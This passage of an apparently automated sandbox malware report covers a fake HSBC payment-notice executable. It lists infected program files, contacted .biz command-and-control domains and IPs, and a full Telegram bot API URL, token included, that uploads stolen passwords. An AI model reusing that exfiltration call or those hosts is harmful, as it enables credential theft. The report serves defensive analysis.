              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://18.141.10.107/8Va&0%Avira URL Cloudsafe
              http://ww99.przvgke.biz/K100%Avira URL Cloudmalware
              https://scss.adobesc.comhttps://scss.adobesc.comhttps://scss.adobesc.com0%Avira URL Cloudsafe
              http://54.244.188.177/NU$0%Avira URL Cloudsafe
              https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload0%Avira URL Cloudsafe
              http://ww12.przvgke.biz/opymuwnb?usid=26&utid=9416579686100%Avira URL Cloudmalware
              http://54.244.188.177/leanpmxsxneexgiv0%Avira URL Cloudsafe
              http://82.112.184.197/hncx0%Avira URL Cloudsafe
              https://scss.adobesc.com00%Avira URL Cloudsafe
              https://scss.adobesc.cominvalidAnnotIdList0%Avira URL Cloudsafe
              https://scss.adobesc.comAcroCoreSyncSharedReviewLoggingEnabledAcrobat_DesktopUserhttps://comments.ad0%Avira URL Cloudsafe
              http://ww99.przvgke.biz/opymuwnb100%Avira URL Cloudmalware
              https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachinehttps://PrefSyncJob/com0%Avira URL Cloudsafe
              http://54.244.188.177/mgppdv0%Avira URL Cloudsafe
              http://82.112.184.197/OV0%Avira URL Cloudsafe
              http://172.234.222.138/0%Avira URL Cloudsafe
              http://54.244.188.177/I$o0%Avira URL Cloudsafe
              http://44.221.84.105/0%Avira URL Cloudsafe
              http://44.221.84.105/bd0%Avira URL Cloudsafe
              https://scss.adobesc.comemptyAnnotations0%Avira URL Cloudsafe
              https://scss.adobesc.comK0%Avira URL Cloudsafe
              https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/RFList0%Avira URL Cloudsafe
              https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachine0%Avira URL Cloudsafe
              http://172.234.222.138/3VX&0%Avira URL Cloudsafe
              https://scss.adobesc.comReadStatus0%Avira URL Cloudsafe
              https://scss.adobesc.comcommandNameAdd_AnnotsDelete_AnnotsUpdate_AnnotsEurekaReviewFetchReviewUpdate0%Avira URL Cloudsafe
              https://lifecycleapp.operationlifecycle.shutdownlifecycle.startuptimer.starttimertimer.stoppedtimer.0%Avira URL Cloudsafe
              http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzU4NWQyYmRm100%Avira URL Cloudmalware
              http://54.244.188.177:80/mgppdv0%Avira URL Cloudsafe
              http://18.141.10.107/3VX&0%Avira URL Cloudsafe
              http://82.112.184.197/fprrydnqfsccl0%Avira URL Cloudsafe
              http://18.141.10.107/tydyiliq10%Avira URL Cloudsafe
              http://18.141.10.107/tydyiliq0%Avira URL Cloudsafe
              http://54.244.188.177/3VX&0%Avira URL Cloudsafe
              http://ww12.przvgke.biz/100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              przvgke.biz
              		172.234.222.138
              		truefalse
                		high
                ssbzmoy.biz
                		18.141.10.107
                		truefalse
                  		high
                  knjghuig.biz
                  		18.141.10.107
                  		truefalse
                    		high
                    vjaxhpbji.biz
                    		82.112.184.197
                    		truefalse
                      		high
                      pywolwnvd.biz
                      		54.244.188.177
                      		truefalse
                        		high
                        reallyfreegeoip.org
                        		104.21.67.152
                        		truefalse
                          		high
                          ifsaia.biz
                          		13.251.16.150
                          		truefalse
                            		high
                            checkip.dyndns.com
                            		193.122.6.168
                            		truefalse
                              		high
                              cvgrf.biz
                              		54.244.188.177
                              		truefalse
                                		high
                                ww99.przvgke.biz
                                		72.52.179.174
                                		truefalse
                                  		unknown
                                  lpuegx.biz
                                  		82.112.184.197
                                  		truefalse
                                    		high
                                    ww99.fwiwk.biz
                                    		72.52.179.174
                                    		truefalse
                                      		unknown
                                      saytjshyf.biz
                                      		44.221.84.105
                                      		truefalse
                                        		high
                                        084725.parkingcrew.net
                                        		76.223.26.96
                                        		truefalse
                                          		high
                                          xlfhhhm.biz
                                          		47.129.31.212
                                          		truefalse
                                            		high
                                            fwiwk.biz
                                            		172.234.222.143
                                            		truefalse
                                              		high
                                              vcddkls.biz
                                              		18.141.10.107
                                              		truefalse
                                                		high
                                                npukfztj.biz
                                                		44.221.84.105
                                                		truefalse
                                                  		high
                                                  api.telegram.org
                                                  		149.154.167.220
                                                  		truefalse
                                                    		high
                                                    ww12.fwiwk.biz
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      zlenh.biz
                                                      		unknown
                                                      		unknownfalse
                                                        		high
                                                        checkip.dyndns.org
                                                        		unknown
                                                        		unknownfalse
                                                          		high
                                                          uhxqin.biz
                                                          		unknown
                                                          		unknownfalse
                                                            		high
                                                            ww12.przvgke.biz
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              anpmnmxo.biz
                                                              		unknown
                                                              		unknownfalse
                                                                		high

                                                                Contacted URLs

                                                                NameMaliciousAntivirus DetectionReputation
                                                                http://xlfhhhm.biz/sqemlirtfccimfofalse
                                                                  		high
                                                                  http://lpuegx.biz/hncxfalse
                                                                    		high
                                                                    http://saytjshyf.biz/peioifalse
                                                                      		high
                                                                      https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.175false
                                                                        		high
                                                                        http://przvgke.biz/opymuwnbfalse
                                                                          		high
                                                                          http://fwiwk.biz/mepglnjkcgfalse
                                                                            		high
                                                                            http://checkip.dyndns.org/false
                                                                              		high
                                                                              http://przvgke.biz/meqybxfalse
                                                                                		high
                                                                                http://vjaxhpbji.biz/hptnyfalse
                                                                                  		high
                                                                                  http://pywolwnvd.biz/mgppdvfalse
                                                                                    		high
                                                                                    http://npukfztj.biz/bdfalse
                                                                                      		high
                                                                                      http://vjaxhpbji.biz/kpfalse
                                                                                        		high
                                                                                        http://ssbzmoy.biz/udpfalse
                                                                                          		high
                                                                                          http://cvgrf.biz/hfsfqfqbrwibfalse
                                                                                            		high
                                                                                            http://pywolwnvd.biz/leanpmxsxneexgivfalse
                                                                                              		high
                                                                                              https://reallyfreegeoip.org/xml/8.46.123.175false
                                                                                                		high
                                                                                                http://lpuegx.biz/fprrydnqfscclfalse
                                                                                                  		high
                                                                                                  http://knjghuig.biz/tydyiliqfalse
                                                                                                    		high
                                                                                                    http://ifsaia.biz/vcyisuboorqdfalse
                                                                                                      		high
                                                                                                      http://vcddkls.biz/ymdlhlfalse
                                                                                                        		high

                                                                                                        URLs from Memory and Binaries

                                                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                                                        https://api.telegram.orgRegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://18.141.10.107/8Va&armsvc.exe, 00000004.00000003.1382519180.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://api.telegram.org/botRegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://ww99.przvgke.biz/Karmsvc.exe, 00000004.00000003.1501311933.00000000008A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            https://scss.adobesc.comhttps://scss.adobesc.comhttps://scss.adobesc.comAdobeCollabSync.exe.4.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://knjghuig.biz/armsvc.exe, 00000004.00000003.1538967838.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1992416564.00000000008A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613RegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://54.244.188.177/leanpmxsxneexgivarmsvc.exe, 00000004.00000003.1354308285.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://scss.adobesc.cominvalidAnnotIdListAdobeCollabSync.exe.4.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/UploadAdobeCollabSync.exe.4.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://54.244.188.177/NU$HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000B8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://ww12.przvgke.biz/opymuwnb?usid=26&utid=9416579686armsvc.exe, 00000004.00000003.1501311933.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1538967838.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1992416564.00000000008A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                https://scss.adobesc.comreasoncom.adobe.review.sdkAdobeCollabSync.exe.4.drfalse
                                                                                                                  		high
                                                                                                                  http://18.141.10.107/armsvc.exe, 00000004.00000003.1382519180.0000000000865000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1538967838.00000000008A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://82.112.184.197/hncxarmsvc.exe, 00000004.00000003.1992970471.0000000000873000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://scss.adobesc.comAdobeCollabSync.exe.4.drfalse
                                                                                                                      		high
                                                                                                                      https://scss.adobesc.com0AdobeCollabSync.exe.4.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://scss.adobesc.comAcroCoreSyncSharedReviewLoggingEnabledAcrobat_DesktopUserhttps://comments.adAdobeCollabSync.exe.4.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://ww99.przvgke.biz/opymuwnbarmsvc.exe, 00000004.00000003.1501939823.00000000008A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      http://checkip.dyndns.org/qHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://reallyfreegeoip.orgRegSvcs.exe, 00000005.00000002.2636185001.00000000027E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachinehttps://PrefSyncJob/comAdobeCollabSync.exe.4.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://scss.adobesc.comemptyAnnotationsAdobeCollabSync.exe.4.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://172.234.222.138/armsvc.exe, 00000004.00000003.1501706102.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://54.244.188.177/mgppdvHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346799710.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000B93000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://checkip.dyndns.comRegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://44.221.84.105/bdarmsvc.exe, 00000004.00000003.1432419986.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000005.00000002.2636185001.0000000002741000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://82.112.184.197/OVarmsvc.exe, 00000004.00000003.1992970471.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://54.244.188.177/armsvc.exe, 00000004.00000003.1354308285.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://44.221.84.105/armsvc.exe, 00000004.00000003.1432419986.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://54.244.188.177/I$oHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000B8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://reallyfreegeoip.org/xml/HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/RFListAdobeCollabSync.exe.4.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://scss.adobesc.comKAdobeCollabSync.exe.4.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://scss.adobesc.comcommandNameAdd_AnnotsDelete_AnnotsUpdate_AnnotsEurekaReviewFetchReviewUpdateAdobeCollabSync.exe.4.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://lifecycleapp.operationlifecycle.shutdownlifecycle.startuptimer.starttimertimer.stoppedtimer.AdobeCollabSync.exe.4.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://checkip.dyndns.orgRegSvcs.exe, 00000005.00000002.2636185001.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzU4NWQyYmRmarmsvc.exe, 00000004.00000003.1488845823.0000000002370000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    		unknown
                                                                                                                                    https://pcnatrk.net/track.armsvc.exe, 00000004.00000003.1488845823.0000000002370000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://172.234.222.138/3VX&armsvc.exe, 00000004.00000003.1501706102.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://scss.adobesc.comReadStatusAdobeCollabSync.exe.4.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachineAdobeCollabSync.exe.4.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://reallyfreegeoip.orgRegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.winimage.com/zLibDllarmsvc.exe, 00000004.00000003.1693479400.0000000001F90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://18.141.10.107/3VX&armsvc.exe, 00000004.00000003.1382519180.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://54.244.188.177:80/mgppdvHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000B93000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://18.141.10.107/tydyiliq1armsvc.exe, 00000004.00000003.1538799340.0000000000873000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://18.141.10.107/tydyiliqarmsvc.exe, 00000004.00000003.1538799340.0000000000873000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://82.112.184.197/fprrydnqfscclarmsvc.exe, 00000004.00000003.1992416564.000000000087B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://api.telegram.orgRegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://54.244.188.177/3VX&armsvc.exe, 00000004.00000003.1354308285.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://ww12.przvgke.biz/armsvc.exe, 00000004.00000003.1501311933.00000000008A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            		unknown
                                                                                                                                            https://api.telegram.org/bot-/sendDocument?chat_id=HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.bizarmsvc.exe, 00000004.00000003.1488845823.0000000002370000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1488451296.0000000002050000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://82.112.184.197/armsvc.exe, 00000004.00000003.1992970471.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high

                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public IPs

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  193.122.6.168
                                                                                                                                                  		checkip.dyndns.comUnited States
                                                                                                                                                  		31898ORACLE-BMC-31898USfalse
                                                                                                                                                  172.234.222.143
                                                                                                                                                  		fwiwk.bizUnited States
                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                  72.52.179.174
                                                                                                                                                  		ww99.przvgke.bizUnited States
                                                                                                                                                  		32244LIQUIDWEBUSfalse
                                                                                                                                                  172.234.222.138
                                                                                                                                                  		przvgke.bizUnited States
                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                  149.154.167.220
                                                                                                                                                  		api.telegram.orgUnited Kingdom
                                                                                                                                                  		62041TELEGRAMRUfalse
                                                                                                                                                  76.223.26.96
                                                                                                                                                  		084725.parkingcrew.netUnited States
                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                  104.21.67.152
                                                                                                                                                  		reallyfreegeoip.orgUnited States
                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                  44.221.84.105
                                                                                                                                                  		saytjshyf.bizUnited States
                                                                                                                                                  		14618AMAZON-AESUSfalse
                                                                                                                                                  54.244.188.177
                                                                                                                                                  		pywolwnvd.bizUnited States
                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                  13.251.16.150
                                                                                                                                                  		ifsaia.bizUnited States
                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                  47.129.31.212
                                                                                                                                                  		xlfhhhm.bizCanada
                                                                                                                                                  		34533ESAMARA-ASRUfalse
                                                                                                                                                  82.112.184.197
                                                                                                                                                  		vjaxhpbji.bizRussian Federation
                                                                                                                                                  		43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                                                  18.141.10.107
                                                                                                                                                  		ssbzmoy.bizUnited States
                                                                                                                                                  		16509AMAZON-02USfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                  Analysis ID:1572492
                                                                                                                                                  Start date and time:2024-12-10 16:23:07 +01:00
                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 13m 31s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                  Number of analysed new started processes analysed:35
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Sample name:HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  Detection:MAL
